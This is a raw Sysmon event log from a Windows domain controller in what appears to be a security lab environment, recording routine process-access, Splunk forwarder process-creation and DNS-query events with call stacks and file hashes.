08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001903Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001902Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001901Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001900Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16B5-5F84-5300-000000007F01}4076C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001899Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16B5-5F84-5200-000000007F01}39723928C:\Windows\system32\cmd.exe{5D479F2C-16B5-5F84-5300-000000007F01}4076C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001898Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.517{5D479F2C-16B5-5F84-5300-000000007F01}4076C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{5D479F2C-16B5-5F84-5200-000000007F01}3972C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-log 10341000x80000000000000001897Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B5-5F84-5200-000000007F01}3972C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001896Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001895Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001894Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001893Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001892Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001891Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001890Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001889Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001888Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001887Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16B5-5F84-5200-000000007F01}3972C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001886Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16B3-5F84-4800-000000007F01}32842912C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{5D479F2C-16B5-5F84-5200-000000007F01}3972C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18274|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001885Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.512{5D479F2C-16B5-5F84-5200-000000007F01}3972C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-16B3-5F84-4800-000000007F01}3284C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 22542200x80000000000000001884Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.527{5D479F2C-169F-5F84-0B00-000000007F01}864win-dc-3574060010.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001883Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.526{5D479F2C-16B1-5F84-2A00-000000007F01}2900win-dc-3574060.attackrange.local0fe80::64fd:4c36:9a5d:fb14;::ffff:10.0.1.14;C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe 22542200x80000000000000001882Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.137{5D479F2C-16B1-5F84-2900-000000007F01}2920win-dc-3574060010.0.1.14;C:\Program Files (x86)\nxlog\nxlog.exe 10341000x80000000000000001881Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.418{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B5-5F84-5100-000000007F01}3720C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001880Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.418{5D479F2C-16B5-5F84-5100-000000007F01}37203724C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e675|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f344c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001879Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.183{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B5-5F84-5100-000000007F01}3720C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001878Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.183{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001877Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.183{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001876Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.183{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001875Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.183{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001874Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 